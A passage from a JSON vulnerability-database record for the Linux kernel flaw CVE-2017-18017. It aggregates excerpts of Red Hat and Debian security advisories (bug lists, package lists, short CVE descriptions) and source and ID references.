must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1443615 - CVE-2017-7645 kernel: nfsd: Incorrect handling of long RPC replies\n1519160 - CVE-2017-1000410 kernel: Stack information leak in the EFS element\n1519591 - CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c\n1548412 - CVE-2017-13166 kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation\n1567074 - CVE-2018-8897 Kernel: error in exception handling leads to DoS\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-696.28.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-headers-2.6.32-696.28.1.el6.i686.rpm\nperf-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm\nkernel-doc-2.6.32-696.28.1.el6.noarch.rpm\nkernel-firmware-2.6.32-696.28.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-headers-2.6.32-696.28.1.el6.x86_64.rpm\nperf-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-696.28.1.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm\nkernel-doc-2.6.32-696.28.1.el6.noarch.rpm\nkernel-firmware-2.6.32-696.28.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-headers-2.6.32-696.28.1.el6.x86_64.rpm\nperf-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-696.28.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-headers-2.6.32-696.28.1.el6.i686.rpm\nperf-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm\nkernel-doc-2.6.32-696.28.1.el6.noarch.rpm\nkernel-firmware-2.6.32-696.28.1.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debug-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-devel-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-headers-2.6.32-696.28.1.el6.ppc64.rpm\nperf-2.6.32-696.28.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debug-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm\nkernel-devel-2.6.32-696.28.1.el6.s390x.rpm\nkernel-headers-2.6.32-696.28.1.el6.s390x.rpm\nkernel-kdump-2.6.32-696.28.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-696.28.1.el6.s390x.rpm\nperf-2.6.32-696.28.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-headers-2.6.32-696.28.1.el6.x86_64.rpm\nperf-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\npython-perf-2.6.32-696.28.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\npython-perf-2.6.32-696.28.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-696.28.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-headers-2.6.32-696.28.1.el6.i686.rpm\nperf-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm\nkernel-doc-2.6.32-696.28.1.el6.noarch.rpm\nkernel-firmware-2.6.32-696.28.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-devel-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-headers-2.6.32-696.28.1.el6.x86_64.rpm\nperf-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\npython-perf-2.6.32-696.28.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-2.6.32-696.28.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-7645\nhttps://access.redhat.com/security/cve/CVE-2017-8824\nhttps://access.redhat.com/security/cve/CVE-2017-13166\nhttps://access.redhat.com/security/cve/CVE-2017-18017\nhttps://access.redhat.com/security/cve/CVE-2017-1000410\nhttps://access.redhat.com/security/cve/CVE-2018-8897\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/3431591\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFa8fO8XlSAg2UNWIIRAnN0AKCBdjdw1bC12xju0GwoOedA1L8osACaA1Ze\n4IKrbiFeHd+C9bqCjUFX4pw=\n=3psi\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load \u0026 Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor\u0027s data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. To be fully functional, up-to-date CPU\nmicrocode applied on the system might be required. Please refer to\nReferences section for further information about this issue, CPU microcode\nrequirements and the potential performance impact. \n\nIn this update, mitigation for PowerPC architecture is provided. Bugs fixed (https://bugzilla.redhat.com/):\n\n1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c\n1566890 - CVE-2018-3639 hw: cpu: speculative store bypass\n\n6. (BZ#1549731)\n\n* Intel Core X-Series (Skylake) processors use a hardcoded Time Stamp\nCounter (TSC) frequency of 25 MHz. In some cases this can be imprecise and\nlead to timing-related problems such as time drift, timers being triggered\nearly, or TSC clock instability. This update mitigates these problems by no\nlonger using the \"native_calibrate_tsc()\" function to define the TSC\nfrequency. Refined calibration is now used to update the clock rate\naccordingly in these cases. (BZ#1547854)\n\n4. 7) - noarch, x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4187-1                   security@debian.org\nhttps://www.debian.org/security/                            Ben Hutchings\nMay 01, 2018                          https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : linux\nCVE ID         : CVE-2015-9016 CVE-2017-0861 CVE-2017-5715 CVE-2017-5753\n                 CVE-2017-13166 CVE-2017-13220 CVE-2017-16526 CVE-2017-16911\n                 CVE-2017-16912 CVE-2017-16913 CVE-2017-16914 CVE-2017-18017\n                 CVE-2017-18203 CVE-2017-18216 CVE-2017-18232 CVE-2017-18241\n                 CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-5332\n                 CVE-2018-5333 CVE-2018-5750 CVE-2018-5803 CVE-2018-6927\n                 CVE-2018-7492 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757\n                 CVE-2018-7995 CVE-2018-8781 CVE-2018-8822 CVE-2018-1000004\n                 CVE-2018-1000199\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. \n\nCVE-2015-9016\n\n    Ming Lei reported a race condition in the multiqueue block layer\n    (blk-mq).  On a system with a driver using blk-mq (mtip32xx,\n    null_blk, or virtio_blk), a local user might be able to use this\n    for denial of service or possibly for privilege escalation. \n\nCVE-2017-0861\n\n    Robb Glasser reported a potential use-after-free in the ALSA (sound)\n    PCM core.  We believe this was not possible in practice. \n\nCVE-2017-5715\n\n    Multiple researchers have discovered a vulnerability in various\n    processors supporting speculative execution, enabling an attacker\n    controlling an unprivileged process to read memory from arbitrary\n    addresses, including from the kernel and all other processes\n    running on the system. \n\n    This specific attack has been named Spectre variant 2 (branch\n    target injection) and is mitigated for the x86 architecture (amd64\n    and i386) by using the \"retpoline\" compiler feature which allows\n    indirect branches to be isolated from speculative execution. \n\nCVE-2017-5753\n\n    Multiple researchers have discovered a vulnerability in various\n    processors supporting speculative execution, enabling an attacker\n    controlling an unprivileged process to read memory from arbitrary\n    addresses, including from the kernel and all other processes\n    running on the system. \n\n    This specific attack has been named Spectre variant 1\n    (bounds-check bypass) and is mitigated by identifying vulnerable\n    code sections (array bounds checking followed by array access) and\n    replacing the array access with the speculation-safe\n    array_index_nospec() function. \n\n    More use sites will be added over time. \n\nCVE-2017-13166\n\n    A bug in the 32-bit compatibility layer of the v4l2 ioctl handling\n    code has been found. Memory protections ensuring user-provided\n    buffers always point to userland memory were disabled, allowing\n    destination addresses to be in kernel space. On a 64-bit kernel a\n    local user with access to a suitable video device can exploit this\n    to overwrite kernel memory, leading to privilege escalation. \n\nCVE-2017-13220\n\n    Al Viro reported that the Bluetooth HIDP implementation could\n    dereference a pointer before performing the necessary type check. \n    A local user could use this to cause a denial of service. \n\nCVE-2017-16526\n\n    Andrey Konovalov reported that the UWB subsystem may dereference\n    an invalid pointer in an error case.  A local user might be able\n    to use this for denial of service. \n\nCVE-2017-16911\n\n    Secunia Research reported that the USB/IP vhci_hcd driver exposed\n    kernel heap addresses to local users.  This information could aid the\n    exploitation of other vulnerabilities. \n\nCVE-2017-16912\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    perform a range check on a received packet header field, leading\n    to an out-of-bounds read.  A remote user able to connect to the\n    USB/IP server could use this for denial of service. \n\nCVE-2017-16913\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    perform a range check on a received packet header field, leading\n    to excessive memory allocation.  A remote user able to connect to\n    the USB/IP server could use this for denial of service. \n\nCVE-2017-16914\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    check for an invalid combination of fields in a received packet,\n    leading to a null pointer dereference.  A remote user able to\n    connect to the USB/IP server could use this for denial of service. \n\nCVE-2017-18017\n\n    Denys Fedoryshchenko reported that the netfilter xt_TCPMSS module\n    failed to validate TCP header lengths, potentially leading to a\n    use-after-free.  If this module is loaded, it could be used by a\n    remote attacker for denial of service or possibly for code\n    execution. \n\nCVE-2017-18203\n\n    Hou Tao reported that there was a race condition in creation and\n    deletion of device-mapper (DM) devices.  A local user could\n    potentially use this for denial of service. \n\nCVE-2017-18216\n\n    Alex Chen reported that the OCFS2 filesystem failed to hold a\n    necessary lock during nodemanager sysfs file operations,\n    potentially leading to a null pointer dereference.  A local user\n    could use this for denial of service. \n\nCVE-2017-18232\n\n    Jason Yan reported a race condition in the SAS (Serial-Attached\n    SCSI) subsystem, between probing and destroying a port.  This\n    could lead to a deadlock. \n\nCVE-2017-18241\n\n    Yunlei He reported that the f2fs implementation does not properly\n    initialise its state if the \"noflush_merge\" mount option is used. \n    A local user with access to a filesystem mounted with this option\n    could use this to cause a denial of service. \n\nCVE-2018-1066\n\n    Dan Aloni reported to Red Hat that the CIFS client implementation\n    would dereference a null pointer if the server sent an invalid\n    response during NTLMSSP setup negotiation.  This could be used\n    by a malicious server for denial of service. \n\nCVE-2018-1068\n\n    The syzkaller tool found that the 32-bit compatibility layer of\n    ebtables did not sufficiently validate offset values. On a 64-bit\n    kernel, a local user with the CAP_NET_ADMIN capability (in any user\n    namespace) could use this to overwrite kernel memory, possibly\n    leading to privilege escalation. Debian disables unprivileged user\n    namespaces by default. \n\nCVE-2018-1092\n\n    Wen Xu reported that a crafted ext4 filesystem image would\n    trigger a null dereference when mounted.  A local user able\n    to mount arbitrary filesystems could use this for denial of\n    service. \n\nCVE-2018-5332\n\n    Mohamed Ghannam reported that the RDS protocol did not\n    sufficiently validate RDMA requests, leading to an out-of-bounds\n    write.  A local attacker on a system with the rds module loaded\n    could use this for denial of service or possibly for privilege\n    escalation. \n\nCVE-2018-5333\n\n    Mohamed Ghannam reported that the RDS protocol did not properly\n    handle an error case, leading to a null pointer dereference.  A\n    local attacker on a system with the rds module loaded could\n    possibly use this for denial of service. \n\nCVE-2018-5750\n\n    Wang Qize reported that the ACPI sbshc driver logged a kernel heap\n    address.  This information could aid the exploitation of other\n    vulnerabilities. \n\nCVE-2018-5803\n\n    Alexey Kodanev reported that the SCTP protocol did not range-check\n    the length of chunks to be created.  A local or remote user could\n    use this to cause a denial of service. \n\nCVE-2018-6927\n\n    Li Jinyue reported that the FUTEX_REQUEUE operation on futexes did\n    not check for negative parameter values, which might lead to a\n    denial of service or other security impact. \n\nCVE-2018-7492\n\n    The syzkaller tool found that the RDS protocol was lacking a null\n    pointer check.  A local attacker on a system with the rds module\n    loaded could use this for denial of service. \n\nCVE-2018-7566\n\n    Fan LongFei reported a race condition in the ALSA (sound)\n    sequencer core, between write and ioctl operations.  This could\n    lead to an out-of-bounds access or use-after-free.  A local user\n    with access to a sequencer device could use this for denial of\n    service or possibly for privilege escalation. \n\nCVE-2018-7740\n\n    Nic Losby reported that the hugetlbfs filesystem\u0027s mmap operation\n    did not properly range-check the file offset.  A local user with\n    access to files on a hugetlbfs filesystem could use this to cause\n    a denial of service. \n\nCVE-2018-7757\n\n    Jason Yan reported a memory leak in the SAS (Serial-Attached\n    SCSI) subsystem.  A local user on a system with SAS devices\n    could use this to cause a denial of service. \n\nCVE-2018-7995\n\n    Seunghun Han reported a race condition in the x86 MCE\n    (Machine Check Exception) driver.  This is unlikely to have\n    any security impact. \n\nCVE-2018-8781\n\n    Eyal Itkin reported that the udl (DisplayLink) driver\u0027s mmap\n    operation did not properly range-check the file offset.  A local\n    user with access to a udl framebuffer device could exploit this to\n    overwrite kernel memory, leading to privilege escalation. \n\nCVE-2018-8822\n\n    Dr Silvio Cesare of InfoSect reported that the ncpfs client\n    implementation did not validate reply lengths from the server.  An\n    ncpfs server could use this to cause a denial of service or\n    remote code execution in the client. \n\nCVE-2018-1000004\n\n    Luo Quan reported a race condition in the ALSA (sound) sequencer\n    core, between multiple ioctl operations.  This could lead to a\n    deadlock or use-after-free.  A local user with access to a\n    sequencer device could use this for denial of service or possibly\n    for privilege escalation. \n\nCVE-2018-1000199\n\n    Andy Lutomirski discovered that the ptrace subsystem did not\n    sufficiently validate hardware breakpoint settings.  Local users\n    can use this to cause a denial of service, or possibly for\n    privilege escalation, on x86 (amd64 and i386) and possibly other\n    architectures. \n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.56-1. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron61fFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Rtqw//Xf/L4bP65wU9M59Ef6xBt+Eph+yxeMsioGhu80ODdMemlmHzASMtfZjY\nAXxyt9l8lbHn8MmwDA4aLhhwHYXwvKATdpHSy1SILrRfb4s9P9uV1vsHaIeZ649E\nhDyNon9hP2tPso6BwqiYHZZy9Xxtd+T8vTBeBZwUKOLBkBRvV/gyNSUdJWp6L8WH\naF4D1hHl9ZotDkyIvkubbx77aqbJ88I4R0n69x7L9udFbuXa+U7hV6dJdnpzyl/7\nOukJfEtnkaUgWu0MdOfFss6iH5OQISn/y/ricRi29oKQiEp3YwnT5J9pFwSQeJJS\nH8ABVt251UoS0J+of3QWw0muOT/6UAF8SNpPKMJXC7Euq8pTmYVPSIeUYf4eqn65\nUHZSCKXaszItq+uzVNYdkj504BJ4cG1lFxZtlrFWwKE8p7QOETN0GKvTRdu/SvDd\nHl2nb4HouLpBYS518Th2/MGgzhXXAuO12MH3smenptZbqxKn9Z0XSTJYzFupgJk/\nkKF2xkDFBE4toTLVE+6XdUKwYk4vkeDZyOGOwRYThSkKAzrUh5zThgal4HnknD2A\n5ye4XLhjgSIT47/nmor6lhxd7WGXGkV33GF0azYlHr/sclfzxcU2Ev3NUBWQ8M3s\nCxfIO0FNCzO0WIUf40md7MlIAnDBIRGyYgNIIe7AnSRKKPykEx8=\n=wNQS\n-----END PGP SIGNATURE-----\n. SchAPnherr (Amazon) for reporting CVE-2017-1000252; and Armis Labs\nfor reporting CVE-2017-1000410",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-18017"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875"
      },
      {
        "db": "BID",
        "id": "102367"
      },
      {
        "db": "VULHUB",
        "id": "VHN-109097"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-18017"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147936"
      },
      {
        "db": "PACKETSTORM",
        "id": "147229"
      },
      {
        "db": "PACKETSTORM",
        "id": "147113"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "147232"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-18017",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "102367",
        "trust": 2.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011875",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-145",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2918",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.1089",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0570",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "147936",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-109097",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-18017",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
